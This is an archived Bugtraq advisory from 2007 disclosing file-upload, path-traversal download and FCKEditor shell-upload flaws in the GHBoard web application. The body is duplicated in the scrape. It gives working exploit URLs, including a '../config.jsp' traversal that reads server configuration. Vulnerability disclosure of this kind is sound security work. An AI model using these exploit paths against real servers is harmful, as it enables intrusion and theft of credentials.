Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Vista
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Focus On: Vista
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Back to list
|
Post reply
Korean GHBoard Multiple Vulnerabilities by Xcross87
Oct 23 2007 06:01PM
pete houston 17187 gmail com
Software : Korean GHBoard
Site : http://www.ghlab.com/
Found by : Xcross87
1. File Upload Vulnerability
Xploit :
victim.com/ghboard/component/upload.jsp
2. FlashUpload component File Upload and File Download Vulnerability
Upload Xploit :
victim.com/ghboard/component/flashupload/upload.html
Not allow upload php,jsp,html
But attacker can download source and remove javascript code which check for file type and upload easily.
Uploaded file is located in :
victim.com/ghboard/component/flashupload/data/upload_filename.xxx
Download Xploit :
You can download any file from server :
victim.com/ghboard/component/flashupload/download.jsp?name=[file_name]
Sample :
victim.com/ghboard/component/flashupload/download.jsp?name=../config.jsp
3. FCK Inclusion :
All version of GHBoard includes FCKEditor package so attacker can use upload vulz of FCKEditor to up shell to server.
=== Xcross87 | HCETeam Xploiter | HCEGroup.Vn ===
[ reply ]
Privacy Statement
Copyright 2007, SecurityFocus
Site : http://www.ghlab.com/
Found by : Xcross87
1. File Upload Vulnerability
Xploit :
victim.com/ghboard/component/upload.jsp
2. FlashUpload component File Upload and File Download Vulnerability
Upload Xploit :
victim.com/ghboard/component/flashupload/upload.html
Not allow upload php,jsp,html
But attacker can download source and remove javascript code which check for file type and upload easily.
Uploaded file is located in :
victim.com/ghboard/component/flashupload/data/upload_filename.xxx
Download Xploit :
You can download any file from server :
victim.com/ghboard/component/flashupload/download.jsp?name=[file_name]
Sample :
victim.com/ghboard/component/flashupload/download.jsp?name=../config.jsp
3. FCK Inclusion :
All version of GHBoard includes FCKEditor package so attacker can use upload vulz of FCKEditor to up shell to server.
=== Xcross87 | HCETeam Xploiter | HCEGroup.Vn ===
[ reply ]